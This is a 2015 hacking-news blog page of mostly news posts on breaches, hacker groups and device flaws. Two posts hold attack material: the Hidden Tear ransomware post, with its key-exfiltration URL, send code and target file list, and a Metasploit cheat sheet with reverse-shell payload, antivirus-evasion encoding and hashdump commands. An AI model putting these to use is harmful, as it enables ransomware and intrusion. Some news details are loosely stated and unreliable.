Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Thursday, 17 September 2015

Russian Hacker who stole 160 million credit card details gets sentenced for 30 years in prison

Russian Hacker who stole 160 million credit card details gets sentenced for 30 years in prison

Russian national pleads guilty in global hacking scheme

Russian Hacker Vladimir Drinkman faces 30 years sentence after pleading guilty to hacking NASDAQ, stealing 160 million credit cards.
Vladimir Drinkman, a 34 year old Russian hacker has pleaded guilty in US Federal Court for his role in hacking NASDAQ, JCPenny, 7 Eleven, Dow Jones, JetBlue and other major organisations in the United States. Reportedly, the hacker admitted his involvement in the world wide scheme that ultimately captured details of more than 160 million credit cards.
Federal attorneys in New Jersey who charged Drinkman with conspiracy charges involving wire fraud and unauthorized access to protected computers said the case was the largest to ever be prosecuted on U.S. soil. They alleged that the American companies and individuals lost more than $300 million because of the date breaches perpetrated by Drinkman.
Drinkman, who was arrested in the Netherlands in 2012 and extradited to the U.S. earlier this year, is scheduled to be sentenced in January.
“Defendants like Vladimir Drinkman, who have the skills to break into our computer networks and the inclination to do so, pose a cutting edge threat to our economic well-being, our privacy and our national security,” U.S. Attorney Paul J. Fishman of the District of New Jersey said in a statement.
Drinkman and his gang, a number of whom remain at large, would monitor the computers of target companies and scan for vulnerabilities in their SQL implementation to create backdoors and ultimately netting the confidential data and later selling it on “underground” forums of the Internet.
Three of his alleged co-conspirators remain fugitives. A fourth, Dmitriy Smilianets, 32, of Moscow, who allegedly sold the stolen information, remains in federal custody.

Wednesday, 16 September 2015

Top 10 Well Known Hacking Groups Of All Time

Top 10 Well Known Hacking Groups Of All Time

World’s 10 most famous hacking groups who have had most success in recent times

Like the animals, hackers also hack their prey in groups. Sometimes these groups become famous for perceived good deeds like hacking ISIS websites done by Anonymous but most of the time these hacker groups operate against the law. Some of the hacker groups have since disbanded after being in public eye. The prime example of infamous hackers group is Lizard Squad. They DDoSed the PlayStation and Xbox servers right during the time of Christmas weekend earning them many villains.
Today we are listing top such 10 most notorious hackers of all time.

1. Lizard Squad

The DDoS attack on Facebook that lowered the popular social media network as well the cyber attacks on Malaysia Airlines website that directed visitors to a page which read “404 – plane not found,” were carried out by the Lizard Squad. While Facebook refused to accept being hacked, Malaysia Airlines stated that their domain had been temporarily redirected elsewhere and that they had not been hacked. Lizard Squad has also hacked Microsoft and Sony.
The intentions of Lizard Squad look dark and gloomy due to the diverse history of their work. They are not totally computer hackers as most of the hack they do is comedy. The group is responsible for a high-profile hack of Microsoft Xbox Live and Sony’s Playstation Network. In August 2014, the group posted the ISIS flag on Sony’s servers and made other indirect references to the “cyber caliphate.” The group was arrested by the authorities in the U.S. and England after the Xbox and Playstation hacks.

2. Syrian Electronic Army

The Syrian Electronic Army claims to target political opposition groups and claims to support the Syrian President Bashar al-Assad. It calls itself “a group of enthusiastic Syrian youths who could not stay passive towards the massive distortion of facts about the recent uprising in Syria”.
It becomes involved in the use of malware, phishing, defacement, spamming, and denial of service (DDoS) attacks with often posting the Syrian flag on a victim’s website. Some have even assumed as a fact that the group is connected with the Syrian state. The group have targeted the Facebook pages and Twitter accounts of President Barack Obama and French President Nicolas Sarkozy, as well as technology companies and news organizations. Their tone is “serious and political to ironic and humorous.”

3. LulzSec

After the HBGary Federal hack of 2011, LulzSec – Lulz Security abbreviated – formed as an Anonymous spinoff. It’s slogan was “Laughing at your security since 2011.” The group announced itself with a hack against Fox.com, then Sony Pictures in 2011. The group took the CIA website offline.
LulzSec had become well known for ridiculing its victims after an attack, which made the analysts compare them to the hacks to internet pranks. In June 2011, a ‘50 days of Lulz’ statement announced that the group had fallen out. However, on July 18, the News Corporation was hacked by the group, who had posted false news about the death of Rupert Murdoch.
In 2012, the LulzSec members were arrested by the FBI after the group’s leader, Sabu, turned them in. Prosecutor Sandip Patel said the group thought of themselves as “latter-day pirates.”

4. Anonymous

“We are Anonymous. We are Legion. We do not forgive. We do not forgive…. Expect us.”
Known most for its hacking and Guy Fawkes masks, Anonymous is a decentralized open online creation group. Reports conceive that Anonymous is made up of thousands of “hacktivists.” The group has compromised religious, corporate and government websites.
The group has declared war on Scientology and hacked the Pentagon. In 2012’s Operation Payback, they also attacked MasterCard, Visa and PayPal for refusing to process payments to WikiLeaks, which in turn led WikiLeaks to choose the cryptocurrency Bitcoin. Anonymous supported Occupy Wall Street and hacked the New York Stock Exchange website in 2011.
For being involved in Anonymous, individuals have been arrested in the U.S., UK, Netherlands, Australia, Spain, and Turkey.

5. The Level Seven Crew

Rumored to be encouraged by the seventh level of hell from Dante’s Inferno, ‘the violent’ level, this hacking group hacked 60 high profile computer systems (NASA, The First American National Bank, Sheraton Hotels) in 1999. They also hacked into the US Embassy in China’s website. However, this group broke up and stopped functioning in 2000.

6. Network Crack Program Hacker (NCPH) Group

It was alleged that the NCPH Group was formed in China in 1994, whose leader Tan Dailin was apparently working for the Chinese army. It is believed that the People’s Liberation Army was funded by the NCPH. The group appears to be based out of Zigon in Sichuan Province.

7. Chaos Computer Club (CCC)

The mission of the Chaos Computer Club is to uncover the security flaws, which basically does not only depend upon illegal activities. It was founded in Berlin during the early 1980s and is one of the largest European hacking groups. The group made its point after they used the Bildschirmtext page to steal 134,000 Deutsch Marks from a Hamburg bank, only to send the money back after having completed its mission the next day, which was to expose a security flaw.
Early CCC member Andy Müller-Maguhn in an interview with OWNI stated: “we needed a lot of legal experts to advise us what we could or could not hack, and to help us distinguish between legal activities and grey areas of legality”. The group’s kindly approach has allowed the CCC to become “an accepted and recognized entity because it has worked to educate the public about technology since the 1980s,” Müller-Maguhn added. The group’s most recent focus has been on the mass surveillance complex, in order to fit in a German hacker ring. CCC Member Falk Garbsch stated:
There have to be consequences. The work of intelligence services has to be reviewed – as does their right to exist. If necessary, their aims and methods will have to be redefined. …We have to think about how these [shared]data are processed and where they can be allowed to resurface. And this is not just the challenge for 2015, but for the next 10 years.
The group has strongly objected French nuclear tests, made full use of COMP128 encryption algorithm of a GSM customer card, stole money on live TV via Microsoft’s ActiveX; and examined the German federal government’s own malware. The group’s press release on the topic reads:
“The malware can not only siphon away intimate data but also offers a remote control or backdoor functionality for uploading and executing arbitrary other programs. Significant design and implementation flaws make all of the functionality available to anyone on the internet.”
The CCC may have characteristics of a Marxist, after being caught selling source code from U.S. corporations and governments to the Soviet Union’s secret police KGB.

8. globalHell

globalHell was founded by street-gang member Patrick Gregory. Data on 115 websites were reportedly destroyed by the group charging millions in damages. In order to get away from street gang life, Gregory had turned to computer. His crew of hackers behaved basically the same as a street gang. “global hell will not die” was reportedly written by the group on the United States Army’s website. Gregory confessed in court to causing $2.5 million in hacking damages.

9. Iran’s Tarh Andishan

Looks like the Tarh Andishan wants to control the world’s web-based systems. Mostly based in Tehran, Iran, the group is approximated to have 20 members. A talented hacker group, Tarh Andishan looks like grew out of a Stuxnet worm virus, which Iran claimed the US and Israel had created.
The Iranian government doubled-down on its cyber warfare. The group uses self-propagating software, backdoors, SQL injection, systems, and other techniques. The group is best known for one of the attacks called “Operation Cleaver.” This hacker group has apparently hacked security systems and airline gates. Most findings were not taken into consideration due to the “grave risk to the physical safety of the world” the group reportedly poses, according to the report.

10. TeaMp0isoN:

A 16-year-old hacker with a pseudonym TriCk started this group in 2010. TeaMp0isoN hacked into Facebook, NATO, the English Defense League, including Tony Blair’s email account. The group broke up and stopped functioning in 2012. However, in 2015, the group rebranded itself as a white-hat computer security research group.
There are several other hacking groups who may be more deadlier than the above. We have listed only those hacker groups who have consistently been able to be in public eye due to their hacking exploits.
You can list the hacker groups which you think should have been included in the top 10 list, in the comments below.

Saturday, 12 September 2015

Hidden Tear – Ransomware-like file crypter


Hidden Tear is a ransomware-like file crypter sample which can be edited for specific use. Hidden Tear is open source tool and you can download this tool on GitHub.

Features:

  • Uses AES algorithm to encrypt files.
  • Sends encryption key to a server.
  • Encrypted files can be decrypted in decryption program with encryption key.
  • Creates a text file on Desktop with given message.
  • Small file size (12 KB)
  • Undetectable by antivirus programs (15/08/2015)

How To Use:



  • Use a web server which supports scripting languages like PHP, PYTHON etc.
  • Change this line with your URL (Use https connection to avoid eavesdropping)
    string tragretURL = "https://www.yoursitehere.com/hidden-tear/write.php??info=";
  • The script should writes the GET parameter to a text file. Sending process running inSendPassword() functionstring info = computerName + "-" + userName + " " + password;
    var fullUrl = targetURL + info;
    var conent = new System.Net.WebClient().DownloadString(fullUrl);
  • Target file extensions can be change. Default list:
    var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};
Note: Use this tool at your own risks, we are not responsible for any damage that cause you. Hidden tear may be used only for Education Purpose only. Do not use it as a ransomware! You could go to jail on obstruction of justice charges just for running hidden tear, even though you are innocent.

Thursday, 10 September 2015

Hackers Won’t Stop: 888 Data Breaches So Far In 2015 and 246 Million Records Lost

The first half of 2015 has been rocked by 888 incidents data breaches so far, leading to 245.9 million records compromised worldwide, as surveyed by Gemalto. It looks as if there is no end to hack attacks.
         As of today, data or information values much higher than money. The immense number of security breaches and hack attacks just prove the point. This year has seen a circumstantial increase in the malicious cyber attacks over the several governments and private firms.
Gemalto, a digital security firm has revealed in its study that in the first half of 2015, there were 888 data breaches leading to 245.9 million records compromised worldwide. What’s worrying is that in approximately 50% of the cases, the amount of data exposed is still unknown. According to IBM, hackers frequently use Tor network for launching hack attacks.
The biggest data breach of this year exposed 78.8 million identity records from Anthem Insurance comprising 32% of the total theft. This was the first in the line of several state-sponsored cyber attacks to follow. 21 million records from the United States Office of Personnel Management, 20 million records from Russia’s dating site Topface, and 10 million record information from India’sGaana.com  are some of the biggest breaches to take place in 2015.
Gemalto-study-total-hacks-in-2015
The top security firms have admitted that these type of incidents are unavoidable. China has come up with a hack proof Quantum communication network as a viable solution that they will launch in 2016. Now only time will tell how effective the network is.
The top 10 data breaches make up for 82% of the total information compromised. In the United States alone there were 671 reported data breaching incidents. Second in line is the UK where its citizens were exposed to 63 hack attacks.
The DDoS attacks this year have also increased by 132% compared to last year.  Learn more about DDoS attacks to safeguard yourself.
888-data-breaches-were-recorded-in-2015-246-million-records-lost-so-far-491374-2

Russian Hackers Hijack Satellite Links To Secretly Spy On US and Europe

Turla, The Russian Hacking Group Hijacks Commercial Satellites To Spy On US and Europe

An Russian-speaking threat actors group that have been active for more than 10 years are using commercial satellites to tap into sensitive data from diplomatic and military agencies in the United States and Europe. The hackers, known as Turla, are also hijacking satellite-based internet links as a tactic to hide their location, according to a report released by cybersecurity firm Kaspersky Lab in Moscow on Wednesday.
Turla’s activities were exposed last year; the Russian-speaking gang has carried out espionage campaigns against more than 500 victims in 45 countries. Named after the malicious software it uses, Turla is best known for targeting government agencies, embassies, military, pharmaceutical, and research organizations in the U.S., Kazakhstan, Russia, Vietnam, and China for eight years to gain political and strategic intelligence through exceptional methods, said Stefan Tanase, senior security researcher at Kaspersky Lab.
Turla, The Russian Hacking Group Hijacks Commercial Satellites To Spy On US and Europe
Turla has been compared by some with another Russian hacker group believed to be behind the hacking of the State Department, White House and Pentagon earlier this year. The attack on Pentagon included 4,000 military and civilian personnel working for the Joint Chiefs of Staff, and the network had to be shut down for two weeks in July.
Speaking to The Washington Post about the satellite hackers, Stefan Tanase said “For us, it was very surprising. This is the first group that we believe has done it. It allows you to achieve a much greater level of anonymity.”
Dmitri Alperovitch, co-founder and chief technology officer of CrowdStrike, an Irvine, California-based cybersecurity technology firm said that the Turla malware was created by a “sophisticated Russian-government-affiliated” hacker group that “we call Venomous Bear.” According to Finland, its Foreign Ministry computer systems had been hit by a Turla attack last year but no detailed information was provided about it.
Kaspersky researchers wrote in a report that it’s use of hijacked downstream-only links is a cheap ($1,000 a year to maintain) and very easy means of moving malware and communicating with compromised machines. Although slow, those connections are a sign for hackers, as links are not encoded and fully developed for abuse.
Turla targets the victim by planting malicious software on the website that it frequently visits and obtains sensitive data. Turla can gain control of the user’s computer as soon as the target opens the site. The hacker instructs the infected computer to send the stolen data to the Internet address of an innocent satellite user online who is using internet service provided by the satellite company.
Turla then seizes control of the the stream of data that is being sent down from the satellite to the victim’s computer by spoofing the user’s internet address. The data is sent to a command server controlled by Turla by hiding it’s location, as it can be anywhere in the range of the satellite beam, which can be thousands of miles.
It most often uses satellite internet connections in Middle Eastern and African countries to avoid the scrutiny of researchers and law enforcement.
“[This technique] essentially makes it impossible for someone to shut down or see their command servers,” Tanase said. “No matter how many levels of proxies you use to hide your server, investigators who are persistent enough can reach the final IP address. It’s just a matter of time until you get discovered. But by using this satellite link, it’s almost impossible to get discovered.”

Tuesday, 8 September 2015

Hackers Turn Off The Pacemaker Of A Simulated Human And Kill It

Hackers Turn Off The Pacemaker Of A Simulated Human And Kill It

Researchers Killed a Simulated Human By Turning Off Its Pacemaker

With the increase in hacking these days, right from infecting a computer to remotely hacking a car in motion, one may wonder what would happen if a hacker decides to compromise your bionic arm, your pacemaker, or maybe your brain implant. Thanks to some students at the University of South Alabama, we have an answer: You die!
To see what would be the outcome of hacking a medical grade human simulation, a group of undergraduates recently at the university spent a few hours to find the same. And the results were as one would expect.
Meet iStan, the “most advanced wireless patient simulator on the market” with internal robotics that mimic human cardiovascular, respiratory, and neurological systems,” according to its manufacturer, http://www.caehealthcare.com/eng/patient-simulators/istan#block_3429. “When iStan bleeds, his blood pressure, heart rate and other clinical signs change automatically, and he responds to treatment with minimal input from an instructor. With wireless operation, iStan can be placed in any field location, including an automobile, and display all the vital signs and signals of a critically ill or injured patient,” CAE Healthcare added.
Costing $100,000, the simulated iStan is frequently used by hospitals to show and explain medical school students how to carry out procedures without killing people.
Mike Jacobs, Director of the simulations program at University of South Alabama, told Motherboard “They sweat, they cry, they talk. It responds to 300 different types of simulated medications and procedures, and the physiological response is identical to that of a human.”
Jacobs and his team decided to find out whether the medical training dummy was susceptible to similar types of attacks as compared to our regular technology. They carried out attacks that could be launches against iStan, concentrating on the communications between it and its controlling laptop’s front-end platform that utilizes Adobe Flash Player and Muse.
With no connected devices whatsoever, iStan, as a robot is much more susceptible to hacking than a human. However, iStan is almost certainly not more hackable than your average pacemaker, which has time and again proved to be susceptible. In contrast to a real human, one need worry about going to jail if you can hack iStan.
“The simulator had a pacemaker so we could speed the heart rate up, we could slow it down. If it had a defibrillator, which most do, we could have shocked it repeatedly. If it was the intent, we could definitely cause harm to the patient,” Jacobs said. “It’s not just a pacemaker, we could do it with an insulin pump, a number of things that would cause life-threatening injuries or death.”
iStan was handed over to a group of undergraduate students taking a cybersecurity class for a semester by Jacobs, who is not a hacker. The team of students was able to gain access to most of iStan’s functions just within a few hours, indicating that iStan’s operation was susceptible to denial-of-service attacks, security control attacks, and its PIN security lock could be busted open through brute force.
“We did this because we were wanting to beef up security on our end and put some safeguards in place. It may not be totally possible to prevent hackers, but, knowing these can easily be hacked increases your awareness of vulnerabilities,” he said. “It’s definitely concerning—if there’s a high profile individual with a medical issue, it certainly makes them vulnerable.”
The researchers went on to explain that “for security reasons” they were not revealing the actual PINs or full device MAC addresses.
The university’s hospital is looking into ways to wirelessly encode transmitted data sent between medical devices, added Jacobs.
The results were published by the team in the preprint journal arXiv, which means that their work has not yet been reviewed by their peers. work has not been peer reviewed yet. The doctors need to be prepared to cope with hackers and cyberattacks in hospitals in the future, suggests the team.
“Future practitioners will be trained to deal with medical device failures, byzantine or otherwise,” they wrote. “[Medical schools] will reinforce the use of alternate or traditional techniques that do not rely on technology.”

Default hard-coded credentials exposes Seagate Wireless Hard Drives to hackers

Default hard-coded credentials exposes Seagate Wireless Hard Drives to hackers

Seagate drives at risk of data theft over hidden backdoor

Security researchers have discovered three severe vulnerabilities in the firmware of threeSeagate wireless hard drives product lines. The security researchers discovered that below listed Seagate hard drives which have firmware versions between 2.2.0.005 and 2.3.0.014 contain these vulnerabilities.
The three affected Seagate hard drive products are
  • LaCie FUEL

  • Seagate Wireless Mobile Storage

  • Seagate Wireless Plus Mobile Storage.

Mike Baucom, Allen Harper, and J. Rach, all security researchers for Tangible Security made the discovery which if exploited can let hackers take complete control of the device storage products and the files stored on it.
The first security vulnerability has been assigned CVE-2015-2874 relates to the Seagate hard drive’s design. In default configurations, the same default admin password used to configure the device, can also be used via Telnet, together with the root username.
If exploited by hackers, the vulnerability allows them to gain access to the Telnet root account and sub-sequentially get control over the hard drive itself, along with all the files stored inside it.
The second and third vulnerabilities which have been assigned CVE-2015-2875 and CVE-2015-2876 respectively, can be exploited when the hard drive again uses the default configuration.
However in these vulnerabilities the hacker can exploit the hard drives wireless to hack and gain unrestricted download and upload capabilities to the device.
The researchers said that they had informed Seagate about all the three vulnerabilities and Seagate is issuing firmware update to fix these issues. The researchers said that users who use the above Seagate hard drives can either wait for Seagate firmware update or patch it with Samsung’s 3.4.1.105 firmware update.
Hard-coded credentials are used by manufacturers to configure the devices before they are shipped, however it is necessary to fix those default settings so that they wont be exploited by cyber criminals. Security researcher Kenn White, criticized the company in a tweet on Sunday for the root logins.

AppLock Android App Used by 100 Million Users is Easily Hackable and Useless

applock-useless-hack
Popular Android app AppLock is used by more than 100 million people. According to the researchers, the app is providing a false sense of security to the users as the app is easily hackable and useless.

                        Millions of users use the Android applications known as app lockers to protect their pictures, messages, and other files. With these apps, you can lock your contacts, Facebook, gallery, texts, call logs to restrict the unauthorized access. One of the most popular apps named AppLock falls in the same category and it’s #1 app locker in more than 50 countries with more than 100 million users.

This app promises to provide complete security to the users, but the securityresearchers at SecuriTeam have reported three easily exploitable flaws in the AppLock Android application. According to the security firm, the app exposes user data even when the application is using a PIN.In the AppLock application, the researchers found 3 vulnerabilities. These vulnerabilities are:
  • The first vulnerability shows that your pictures and videos are not encrypted and they are just hidden from the users. They can be recovered with their original filenames without any root permission.
  • The second vulnerability deals with the root permission and how one can easily remove the PIN code from the app and add it to others. A person can also change the existing PIN.
  • The third and most critical vulnerability talks about the PIN bypass. By exploiting this vulnerability, one can reset the PIN code without root permissions and take full control of the device.
The PIN bypass flaw allows the attacker to intercept HTTP request and responses while trying to recover a lost PIN. This is due to the weak reset PIN mechanism. In this situation, an attacker can reset the password by sending the PIN to his/her own email. Along the same lines, in the app, there is a lack of encryption that allows the attacker to access the files inside AppLock’s SQLite database.
These vulnerabilities and steps to access locked files is shared in details on the SecuriTeam blog.

Monday, 7 September 2015

Metasploit Cheat Sheet Free Download


Metasploit Cheat Sheet by Yori Kvitchko, Tom Hessman, Daniel Pendolino, & Ed Skoudis from Sans.org

Meterpreter Post Modules

With an available Meterpreter session, post modules can be run on the target machine.
Post Modules from Meterpreter
meterpreter > run post/multi/gather/env
Post Modules on a Backgrounded Session
msf > use post/windows/gather/hashdump
msf > show options
msf > set SESSION 1
msf > run

Useful Auxiliary Modules

Port Scanner:
msf > use auxiliary/scanner/portscan/
tcp
msf > set RHOSTS 10.10.10.0/24
msf > run
DNS Enumeration
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run
FTP Server
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run
Proxy Server
msf > use auxiliary/server/socks4
msf > run
Any proxied traffic that matches the subnet of a route will be routed through the session specified by route.
Use proxychains configured for socks4 to route any application’s traffic through a Meterpreter session.

msfvenom

The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former
msfpayload and msfencode tools. Run with
‘’-l payloads’ to get a list of payloads.
$ msfvenom –p [PayloadPath]
–f [FormatType]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]
Example
Reverse Meterpreter payload as an executable and
redirected into a file:
$ msfvenom -p windows/meterpreter/
reverse_tcp -f exe LHOST=10.1.1.1
LPORT=4444 > met.exe
Format Options (specified with –f)
–help-formats – List available output formats
exe – Executable
pl – Perl
rb – Ruby
raw – Raw shellcode
c – C code
Encoding Payloads with msfvenom
The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with ‘-l encoders‘ to get a list of encoders.
$ msfvenom -p [Payload] -e [Encoder] -f
[FormatType] -i [EncodeInterations]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]
Example
Encode a payload from msfpayload 5 times using shikataga-nai encoder and output as executable:
$ msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST=10.1.1.1 LPORT=4444 > mal.exe

Metasploit Console Basics (msfconsole)

Search for module:
msf > search [regex]
Specify and exploit to use:
msf > use exploit/[ExploitPath]
Specify a Payload to use:
msf > set PAYLOAD [PayloadPath]
Show options for the current modules:
msf > show options
Set options:
msf > set [Option] [Value]
Start exploit:
msf > exploit

Metasploit Meterpreter

Base Commands:
? / help: Display a summary of commands
exit / quit: Exit the Meterpreter session
sysinfo: Show the system name and OS type
shutdown / reboot: Self-explanatory
File System Commands:
cd: Change directory
lcd: Change directory on local (attacker’s) machine
pwd / getwd: Display current working directory
ls: Show the contents of the directory
cat: Display the contents of a file on screen
download / upload: Move files to/from the target machine
mkdir / rmdir: Make / remove directory
edit: Open a file in the default editor (typically vi)

Metasploit Meterpreter (contd)

Process Commands:
getpid: Display the process ID that Meterpreter is running inside
getuid: Display the user ID that Meterpreter is running with
ps: Display process list
kill: Terminate a process given its process ID
execute: Run a given program with the privileges
of the process the Meterpreter is loaded in
migrate: Jump to a given destination process ID
– Target process must have same or lesser privileges
– Target process may be a more stable process
– When inside a process, can access any files that
process has a lock on
Network Commands:
ipconfig: Show network interface information
portfwd: Forward packets through TCP session
route: Manage/view the system’s routing table
Misc Commands:
idletime: Display the duration that the GUI of the target machine has been idle
uictl [enable/disable] [keyboard/mouse]: Enable/disable either the mouse or keyboard of the target machine
screenshot: Save as an image a screenshot of the target machine
Additional Modules:
use [module]: Load the specified module
Example:
use priv: Load the priv module
hashdump: Dump the hashes from the box
timestomp:Alter NTFS file timestamps

Managing Sessions

Multiple Exploitation:
Run the exploit expecting a single session that is immediately backgrounded:
msf > exploit -z
Run the exploit in the background expecting one or more sessions that are immediately backgrounded:
msf > exploit –j
List all current jobs (usually exploit listeners):
msf > jobs –l
Kill a job:
msf > jobs –k [JobID]
Multiple Sessions:
List all backgrounded sessions: msf > sessions -l
Interact with a backgrounded session:msf > session -i [SessionID]
Background the current interactive session:meterpreter > <Ctrl+Z> or meterpreter > background
Routing Through Sessions:
All modules (exploits/post/aux) against the target subnet mask will be pivoted through this session.
msf > route add [Subnet to Route To]
[Subnet Netmask] [SessionID]

Nearly 15,000 Arrested By Chinese Police For Cyber Crime



China Police has arrested nearly 15,000 people on suspicion of cyber crimes as part of a sweeping six-month probe called “Operation Clean Internet”, according to a statement from the Ministry of Public Security.It also added that the suspects have been arrested for their involvement in cyber crimes that “jeopardized Internet security”
In July, China launched a six-month campaign codenamed “Cleaning the Internet” to fight against online hackers. Police investigated 66,000 websites including hacking, online fraud and the illegal sale of personal information.They targeted websites providing “illegal and harmful information” besides advertisements for pornography, explosives and firearms and gambling.
In 2015 alone Chinese authorities have deleted 758,000 pieces of illegal information from Chinese websites.